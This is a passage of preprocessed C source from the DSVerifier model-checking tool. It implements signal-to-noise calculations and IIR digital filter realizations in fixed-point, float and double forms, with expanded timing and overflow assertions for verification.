return fxp_log10_low(x) + 9.030873362;
}
x = x / 32767.0;
return fxp_log10_low(x) + 4.515436681;
}
return fxp_log10_low(x);
}
float snrVariance(float s[], float n[], int blksz) {
int i;
double sm = 0, nm = 0, sv = 0, nv = 0, snr;
for (i = 0; i < blksz; i++) {
sm += s[i];
nm += n[i];
}
sm /= blksz;
nm /= blksz;
for (i = 0; i < blksz; i++) {
sv += (s[i] - sm) * (s[i] - sm);
nv += (n[i] - nm) * (n[i] - nm);
}
if (nv != 0.0f) {
# 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
((void) sizeof ((
# 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
sv >= nv
# 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
sv >= nv
# 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ; else __assert_fail (
# 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
"sv >= nv"
# 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h", 373, __extension__ __PRETTY_FUNCTION__); }))
# 373 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
;
snr = sv / nv;
return snr;
} else {
return 9999.9f;
}
}
float snrPower(float s[], float n[], int blksz) {
int i;
double sv = 0, nv = 0, snr;
for (i = 0; i < blksz; i++) {
sv += s[i] * s[i];
nv += n[i] * n[i];
}
if (nv != 0.0f) {
# 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
((void) sizeof ((
# 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
sv >= nv
# 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
sv >= nv
# 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ; else __assert_fail (
# 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
"sv >= nv"
# 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h", 394, __extension__ __PRETTY_FUNCTION__); }))
# 394 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
;
snr = sv / nv;
return snr;
} else {
return 9999.9f;
}
}
float snrPoint(float s[], float n[], int blksz) {
int i;
double ratio = 0, power = 0;
for (i = 0; i < blksz; i++) {
if(n[i] == 0) continue;
ratio = s[i] / n[i];
if(ratio > 150.0f || ratio < -150.0f) continue;
power = ratio * ratio;
# 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
((void) sizeof ((
# 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
power >= 1.0f
# 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
power >= 1.0f
# 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ; else __assert_fail (
# 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
"power >= 1.0f"
# 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h", 412, __extension__ __PRETTY_FUNCTION__); }))
# 412 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
;
}
return 9999.9f;
}
unsigned long next = 1;
int rand(void)
{
next = next*1103515245 + 12345;
return (unsigned int)(next/65536) % 32768;
}
void srand(unsigned int seed)
{
next = seed;
}
float iirIIOutTime(float w[], float x, float a[], float b[], int Na, int Nb) {
int timer1 = 0;
float *a_ptr, *b_ptr, *w_ptr;
float sum = 0;
a_ptr = &a[1];
b_ptr = &b[0];
w_ptr = &w[1];
int k, j;
timer1 += 71;
for (j = 1; j < Na; j++) {
w[0] -= *a_ptr++ * *w_ptr++;
timer1 += 54;
}
w[0] += x;
w_ptr = &w[0];
for (k = 0; k < Nb; k++) {
sum += *b_ptr++ * *w_ptr++;
timer1 += 46;
}
timer1 += 38;
# 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
((void) sizeof ((
# 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
(double)timer1*1 / 16000000 <= (double)1 / 100
# 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
(double)timer1*1 / 16000000 <= (double)1 / 100
# 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ; else __assert_fail (
# 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
"(double)timer1*CYCLE <= (double)DEADLINE"
# 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h", 450, __extension__ __PRETTY_FUNCTION__); }))
# 450 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
;
return sum;
}
float iirIItOutTime(float w[], float x, float a[], float b[], int Na, int Nb) {
int timer1 = 0;
float *a_ptr, *b_ptr;
float yout = 0;
a_ptr = &a[1];
b_ptr = &b[0];
int Nw = Na > Nb ? Na : Nb;
yout = (*b_ptr++ * x) + w[0];
int j;
timer1 += 105;
for (j = 0; j < Nw - 1; j++) {
w[j] = w[j + 1];
if (j < Na - 1) {
w[j] -= *a_ptr++ * yout;
timer1 += 41;
}
if (j < Nb - 1) {
w[j] += *b_ptr++ * x;
timer1 += 38;
}
timer1 += 54;
}
timer1 += 7;
# 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
((void) sizeof ((
# 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
(double)timer1*1 / 16000000 <= (double)1 / 100
# 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
(double)timer1*1 / 16000000 <= (double)1 / 100
# 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ; else __assert_fail (
# 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
"(double)timer1*CYCLE <= (double)DEADLINE"
# 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h", 477, __extension__ __PRETTY_FUNCTION__); }))
# 477 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
;
return yout;
}
double iirIItOutTime_double(double w[], double x, double a[], double b[], int Na, int Nb) {
int timer1 = 0;
double *a_ptr, *b_ptr;
double yout = 0;
a_ptr = &a[1];
b_ptr = &b[0];
int Nw = Na > Nb ? Na : Nb;
yout = (*b_ptr++ * x) + w[0];
int j;
timer1 += 105;
for (j = 0; j < Nw - 1; j++) {
w[j] = w[j + 1];
if (j < Na - 1) {
w[j] -= *a_ptr++ * yout;
timer1 += 41;
}
if (j < Nb - 1) {
w[j] += *b_ptr++ * x;
timer1 += 38;
}
timer1 += 54;
}
timer1 += 7;
# 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
((void) sizeof ((
# 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
(double)timer1*1 / 16000000 <= (double)1 / 100
# 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
(double)timer1*1 / 16000000 <= (double)1 / 100
# 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
) ; else __assert_fail (
# 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
"(double)timer1*CYCLE <= (double)DEADLINE"
# 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h", 504, __extension__ __PRETTY_FUNCTION__); }))
# 504 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/functions.h"
;
return yout;
}
void iirOutBoth(float yf[], float xf[], float af[], float bf[], float *sumf_ref,
fxp_t y[], fxp_t x[], fxp_t a[], fxp_t b[], fxp_t *sum_ref, int Na, int Nb) {
fxp_t *a_ptr, *y_ptr, *b_ptr, *x_ptr;
float *af_ptr, *yf_ptr, *bf_ptr, *xf_ptr;
fxp_t sum = 0;
float sumf = 0;
a_ptr = &a[1];
y_ptr = &y[Na - 1];
b_ptr = &b[0];
x_ptr = &x[Nb - 1];
af_ptr = &af[1];
yf_ptr = &yf[Na - 1];
bf_ptr = &bf[0];
xf_ptr = &xf[Nb - 1];
int i, j;
for (i = 0; i < Nb; i++) {
sum = fxp_add(sum, fxp_mult(*b_ptr++, *x_ptr--));
sumf += *bf_ptr++ * *xf_ptr--;
}
for (j = 1; j < Na; j++) {
sum = fxp_sub(sum, fxp_mult(*a_ptr++, *y_ptr--));
sumf -= *af_ptr++ * *yf_ptr--;
}
*sum_ref = sum;
*sumf_ref = sumf;
}
fxp_t iirOutFixedL(fxp_t y[], fxp_t x[], fxp_t xin, fxp_t a[], fxp_t b[], int Na, int Nb) {
fxp_t *a_ptr, *y_ptr, *b_ptr, *x_ptr;
fxp_t sum = 0;
a_ptr = &a[Na - 1];
y_ptr = &y[1];
b_ptr = &b[Nb - 1];
x_ptr = &x[0];
int i, j;
for (i = 0; i < Nb - 1; i++) {
x[i] = x[i+1];
sum = fxp_add(sum, fxp_mult(*b_ptr--, *x_ptr++));
}
x[Nb - 1] = xin;
sum = fxp_add(sum, fxp_mult(*b_ptr--, *x_ptr++));
for (j = 1; j < Na - 1; j++) {
sum = fxp_sub(sum, fxp_mult(*a_ptr--, *y_ptr++));
y[j] = y[j+1];
}
if(Na>1) sum = fxp_sub(sum, fxp_mult(*a_ptr--, *y_ptr++));
y[Na - 1] = sum;
return sum;
}
float iirOutFloatL(float y[], float x[], float xin, float a[], float b[], int Na, int Nb) {
float *a_ptr, *y_ptr, *b_ptr, *x_ptr;
float sum = 0;
a_ptr = &a[Na - 1];
y_ptr = &y[1];
b_ptr = &b[Nb - 1];
x_ptr = &x[0];
int i, j;
for (i = 0; i < Nb - 1; i++) {
x[i] = x[i+1];
sum += *b_ptr-- * *x_ptr++;
}
x[Nb - 1] = xin;
sum += *b_ptr-- * *x_ptr++;
for (j = 1; j < Na - 1; j++) {
sum -= *a_ptr-- * *y_ptr++;
y[j] = y[j+1];
}
if(Na>1) sum -= *a_ptr-- * *y_ptr++;
y[Na - 1] = sum;
return sum;
}
float iirOutBothL(float yf[], float xf[], float af[], float bf[], float xfin,
fxp_t y[], fxp_t x[], fxp_t a[], fxp_t b[], fxp_t xin, int Na, int Nb) {
fxp_t *a_ptr, *y_ptr, *b_ptr, *x_ptr;
fxp_t sum = 0;
a_ptr = &a[Na - 1];
y_ptr = &y[1];
b_ptr = &b[Nb - 1];
x_ptr = &x[0];
float *af_ptr, *yf_ptr, *bf_ptr, *xf_ptr;
float sumf = 0;
af_ptr = &af[Na - 1];
yf_ptr = &yf[1];
bf_ptr = &bf[Nb - 1];
xf_ptr = &xf[0];
int i, j;
for (i = 0; i < Nb - 1; i++) {
x[i] = x[i+1];
sum = fxp_add(sum, fxp_mult(*b_ptr--, *x_ptr++));
xf[i] = xf[i+1];
sumf += *bf_ptr-- * *xf_ptr++;
}
x[Nb - 1] = xin;
sum = fxp_add(sum, fxp_mult(*b_ptr--, *x_ptr++));
xf[Nb - 1] = xfin;
sumf += *bf_ptr-- * *xf_ptr++;
for (j = 1; j < Na - 1; j++) {
sum = fxp_sub(sum, fxp_mult(*a_ptr--, *y_ptr++));
y[j] = y[j+1];
sumf -= *af_ptr-- * *yf_ptr++;
yf[j] = yf[j+1];
}
if(Na>1) sum = fxp_sub(sum, fxp_mult(*a_ptr--, *y_ptr++));
y[Na - 1] = sum;
if(Na>1) sumf -= *af_ptr-- * *yf_ptr++;
yf[Na - 1] = sumf;
return fxp_to_float(sum) - sumf;
}
float iirOutBothL2(float yf[], float xf[], float af[], float bf[], float xfin,
fxp_t y[], fxp_t x[], fxp_t a[], fxp_t b[], fxp_t xin, int Na, int Nb) {
fxp_t *a_ptr, *y_ptr, *b_ptr, *x_ptr;
fxp_t sum = 0;
a_ptr = &a[Na - 1];
y_ptr = &y[1];
b_ptr = &b[Nb - 1];
x_ptr = &x[0];
float *af_ptr, *yf_ptr, *bf_ptr, *xf_ptr;
float sumf = 0;
af_ptr = &af[Na - 1];
yf_ptr = &yf[1];
bf_ptr = &bf[Nb - 1];
xf_ptr = &xf[0];
int i=0, j=1;
for (i = 0; i < Nb - 1; i++) {
x[i] = x[i+1];
sum = fxp_add(sum, fxp_mult(b[Nb - 1 - i], x[i]));
xf[i] = xf[i+1];
sumf += bf[Nb - 1 - i] * xf[i];
}
x[Nb - 1] = xin;
sum = fxp_add(sum, fxp_mult(b[Nb - 1 - i], x[i]));
xf[Nb - 1] = xfin;
sumf += bf[Nb - 1 - i] * xf[i];
for (j = 1; j < Na - 1; j++) {
sum = fxp_sub(sum, fxp_mult(a[Na - j], y[j]));
y[j] = y[j+1];
sumf -= af[Na - j] * yf[j];
yf[j] = yf[j+1];
}
if(Na>1) sum = fxp_sub(sum, fxp_mult(a[Na - j], y[j]));
y[Na - 1] = sum;
if(Na>1) sumf -= af[Na - j] * yf[j];
yf[Na - 1] = sumf;
return fxp_to_float(sum) - sumf;
}
# 25 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/dsverifier.h" 2
# 1 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 1
# 19 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
extern digital_system ds;
extern hardware hw;
extern int generic_timer;
fxp_t fxp_direct_form_1(fxp_t y[], fxp_t x[], fxp_t a[], fxp_t b[], int Na, int Nb) {
fxp_t *a_ptr, *y_ptr, *b_ptr, *x_ptr;
fxp_t sum = 0;
a_ptr = &a[1];
y_ptr = &y[Na - 1];
b_ptr = &b[0];
x_ptr = &x[Nb - 1];
int i, j;
for (i = 0; i < Nb; i++) {
sum = fxp_add(sum, fxp_mult(*b_ptr++, *x_ptr--));
}
for (j = 1; j < Na; j++) {
sum = fxp_sub(sum, fxp_mult(*a_ptr++, *y_ptr--));
}
fxp_verify_overflow_node(sum, "An Overflow Occurred in the node a0");
sum = fxp_div(sum,a[0]);
return fxp_quantize(sum);
}
fxp_t fxp_direct_form_2(fxp_t w[], fxp_t x, fxp_t a[], fxp_t b[], int Na, int Nb) {
fxp_t *a_ptr, *b_ptr, *w_ptr;
fxp_t sum = 0;
a_ptr = &a[1];
b_ptr = &b[0];
w_ptr = &w[1];
int k, j;
for (j = 1; j < Na; j++) {
w[0] = fxp_sub(w[0], fxp_mult(*a_ptr++, *w_ptr++));
}
w[0] = fxp_add(w[0], x);
w[0] = fxp_div(w[0], a[0]);
fxp_verify_overflow_node(w[0], "An Overflow Occurred in the node b0");
w_ptr = &w[0];
for (k = 0; k < Nb; k++) {
sum = fxp_add(sum, fxp_mult(*b_ptr++, *w_ptr++));
}
return fxp_quantize(sum);
}
fxp_t fxp_transposed_direct_form_2(fxp_t w[], fxp_t x, fxp_t a[], fxp_t b[], int Na, int Nb) {
fxp_t *a_ptr, *b_ptr;
fxp_t yout = 0;
a_ptr = &a[1];
b_ptr = &b[0];
int Nw = Na > Nb ? Na : Nb;
yout = fxp_add(fxp_mult(*b_ptr++, x), w[0]);
yout = fxp_div(yout, a[0]);
int j;
for (j = 0; j < Nw - 1; j++) {
w[j] = w[j + 1];
if (j < Na - 1) {
w[j] = fxp_sub(w[j], fxp_mult(*a_ptr++, yout));
}
if (j < Nb - 1) {
w[j] = fxp_add(w[j], fxp_mult(*b_ptr++, x));
}
}
fxp_verify_overflow_node(w[j], "An Overflow Occurred in the node a0");
return fxp_quantize(yout);
}
double double_direct_form_1(double y[], double x[], double a[], double b[], int Na, int Nb) {
double *a_ptr, *y_ptr, *b_ptr, *x_ptr;
double sum = 0;
a_ptr = &a[1];
y_ptr = &y[Na - 1];
b_ptr = &b[0];
x_ptr = &x[Nb - 1];
int i, j;
for (i = 0; i < Nb; i++) {
sum += *b_ptr++ * *x_ptr--;
}
for (j = 1; j < Na; j++) {
sum -= *a_ptr++ * *y_ptr--;
}
sum = (sum / a[0]);
return sum;
}
double double_direct_form_2(double w[], double x, double a[], double b[], int Na, int Nb) {
double *a_ptr, *b_ptr, *w_ptr;
double sum = 0;
a_ptr = &a[1];
b_ptr = &b[0];
w_ptr = &w[1];
int k, j;
for (j = 1; j < Na; j++) {
w[0] -= *a_ptr++ * *w_ptr++;
}
w[0] += x;
w[0] = w[0] / a[0];
w_ptr = &w[0];
for (k = 0; k < Nb; k++) {
sum += *b_ptr++ * *w_ptr++;
}
return sum;
}
double double_transposed_direct_form_2(double w[], double x, double a[], double b[], int Na, int Nb) {
double *a_ptr, *b_ptr;
double yout = 0;
a_ptr = &a[1];
b_ptr = &b[0];
int Nw = Na > Nb ? Na : Nb;
yout = (*b_ptr++ * x) + w[0];
yout = yout / a[0];
int j;
for (j = 0; j < Nw - 1; j++) {
w[j] = w[j + 1];
if (j < Na - 1) {
w[j] -= *a_ptr++ * yout;
}
if (j < Nb - 1) {
w[j] += *b_ptr++ * x;
}
}
return yout;
}
float float_direct_form_1(float y[], float x[], float a[], float b[], int Na, int Nb) {
float *a_ptr, *y_ptr, *b_ptr, *x_ptr;
float sum = 0;
a_ptr = &a[1];
y_ptr = &y[Na - 1];
b_ptr = &b[0];
x_ptr = &x[Nb - 1];
int i, j;
for (i = 0; i < Nb; i++) {
sum += *b_ptr++ * *x_ptr--;
}
for (j = 1; j < Na; j++) {
sum -= *a_ptr++ * *y_ptr--;
}
sum = (sum / a[0]);
return sum;
}
float float_direct_form_2(float w[], float x, float a[], float b[], int Na, int Nb) {
float *a_ptr, *b_ptr, *w_ptr;
float sum = 0;
a_ptr = &a[1];
b_ptr = &b[0];
w_ptr = &w[1];
int k, j;
for (j = 1; j < Na; j++) {
w[0] -= *a_ptr++ * *w_ptr++;
}
w[0] += x;
w[0] = w[0] / a[0];
w_ptr = &w[0];
for (k = 0; k < Nb; k++) {
sum += *b_ptr++ * *w_ptr++;
}
return sum;
}
float float_transposed_direct_form_2(float w[], float x, float a[], float b[], int Na, int Nb) {
float *a_ptr, *b_ptr;
float yout = 0;
a_ptr = &a[1];
b_ptr = &b[0];
int Nw = Na > Nb ? Na : Nb;
yout = (*b_ptr++ * x) + w[0];
yout = yout / a[0];
int j;
for (j = 0; j < Nw - 1; j++) {
w[j] = w[j + 1];
if (j < Na - 1) {
w[j] -= *a_ptr++ * yout;
}
if (j < Nb - 1) {
w[j] += *b_ptr++ * x;
}
}
return yout;
}
double double_direct_form_1_MSP430(double y[], double x[], double a[], double b[], int Na, int Nb){
int timer1 = 0;
double *a_ptr, *y_ptr, *b_ptr, *x_ptr;
double sum = 0;
a_ptr = &a[1];
y_ptr = &y[Na-1];
b_ptr = &b[0];
x_ptr = &x[Nb-1];
int i, j;
timer1 += 91;
for (i = 0; i < Nb; i++){
sum += *b_ptr++ * *x_ptr--;
timer1 += 47;
}
for (j = 1; j < Na; j++){
sum -= *a_ptr++ * *y_ptr--;
timer1 += 57;
}
timer1 += 3;
# 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
((void) sizeof ((
# 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
(double) timer1 * hw.cycle <= ds.sample_time
# 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
(double) timer1 * hw.cycle <= ds.sample_time
# 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
) ; else __assert_fail (
# 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
"(double) timer1 * hw.cycle <= ds.sample_time"
# 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h", 235, __extension__ __PRETTY_FUNCTION__); }))
# 235 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
;
return sum;
}
double double_direct_form_2_MSP430(double w[], double x, double a[], double b[], int Na, int Nb) {
int timer1 = 0;
double *a_ptr, *b_ptr, *w_ptr;
double sum = 0;
a_ptr = &a[1];
b_ptr = &b[0];
w_ptr = &w[1];
int k, j;
timer1 += 71;
for (j = 1; j < Na; j++) {
w[0] -= *a_ptr++ * *w_ptr++;
timer1 += 54;
}
w[0] += x;
w[0] = w[0] / a[0];
w_ptr = &w[0];
for (k = 0; k < Nb; k++) {
sum += *b_ptr++ * *w_ptr++;
timer1 += 46;
}
timer1 += 38;
# 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
((void) sizeof ((
# 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
(double) timer1 * hw.cycle <= ds.sample_time
# 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
(double) timer1 * hw.cycle <= ds.sample_time
# 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
) ; else __assert_fail (
# 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
"(double) timer1 * hw.cycle <= ds.sample_time"
# 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h", 262, __extension__ __PRETTY_FUNCTION__); }))
# 262 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
;
return sum;
}
double double_transposed_direct_form_2_MSP430(double w[], double x, double a[], double b[], int Na, int Nb) {
int timer1 = 0;
double *a_ptr, *b_ptr;
double yout = 0;
a_ptr = &a[1];
b_ptr = &b[0];
int Nw = Na > Nb ? Na : Nb;
yout = (*b_ptr++ * x) + w[0];
int j;
timer1 += 105;
for (j = 0; j < Nw - 1; j++) {
w[j] = w[j + 1];
if (j < Na - 1) {
w[j] -= *a_ptr++ * yout;
timer1 += 41;
}
if (j < Nb - 1) {
w[j] += *b_ptr++ * x;
timer1 += 38;
}
timer1 += 54;
}
timer1 += 7;
# 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
((void) sizeof ((
# 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
(double) timer1 * hw.cycle <= ds.sample_time
# 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
) ? 1 : 0), __extension__ ({ if (
# 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
(double) timer1 * hw.cycle <= ds.sample_time
# 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
) ; else __assert_fail (
# 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
"(double) timer1 * hw.cycle <= ds.sample_time"
# 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h" 3 4
, "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h", 291, __extension__ __PRETTY_FUNCTION__); }))
# 291 "/home/yashchopda/Desktop/dsverifier-v2.0.3-esbmc-v4.0-cbmc-5.6/bmc/core/realizations.h"
;
return yout;
}
double generic_timing_double_direct_form_1(double y[], double x[], double a[], double b[], int Na, int Nb){
generic_timer += ((6 * hw.assembly.push) + (3 * hw.assembly.in) + (1 * hw.assembly.sbiw) + (1 * hw.assembly.cli) + (3 * hw.assembly.out) + (12 * hw.assembly.std));
double *a_ptr, *y_ptr, *b_ptr, *x_ptr;
double sum = 0;
a_ptr = &a[1];
y_ptr = &y[Na-1];
b_ptr = &b[0];
x_ptr = &x[Nb-1];
generic_timer += ((12 * hw.assembly.std) + (12 * hw.assembly.ldd) + (2 * hw.assembly.subi) + (2 * hw.assembly.sbci) + (4 * hw.assembly.lsl) + (4 * hw.assembly.rol) + (2 * hw.assembly.add) + (2 * hw.assembly.adc) + (1 * hw.assembly.adiw));
int i, j;
generic_timer += ((2 * hw.assembly.std) + (1 * hw.assembly.rjmp));
for (i = 0; i < Nb; i++){
generic_timer += ((20 * hw.assembly.ldd) + (24 * hw.assembly.mov) + (2 * hw.assembly.subi) + (1 * hw.assembly.sbci) + (1 * hw.assembly.sbc) + (10 * hw.assembly.std) + (2 * hw.assembly.ld) + (2 * hw.assembly.rcall) + (1 * hw.assembly.adiw) + (1 * hw.assembly.cp) + (1 * hw.assembly.cpc) + (1 * hw.assembly.adiw) + (1 * hw.assembly.brge) + (1 * hw.assembly.rjmp));
sum += *b_ptr++ * *x_ptr--;
}
generic_timer += ((2 * hw.assembly.ldi) + (2 * hw.assembly.std) + (1 * hw.assembly.rjmp));
for (j = 1; j < Na; j++){
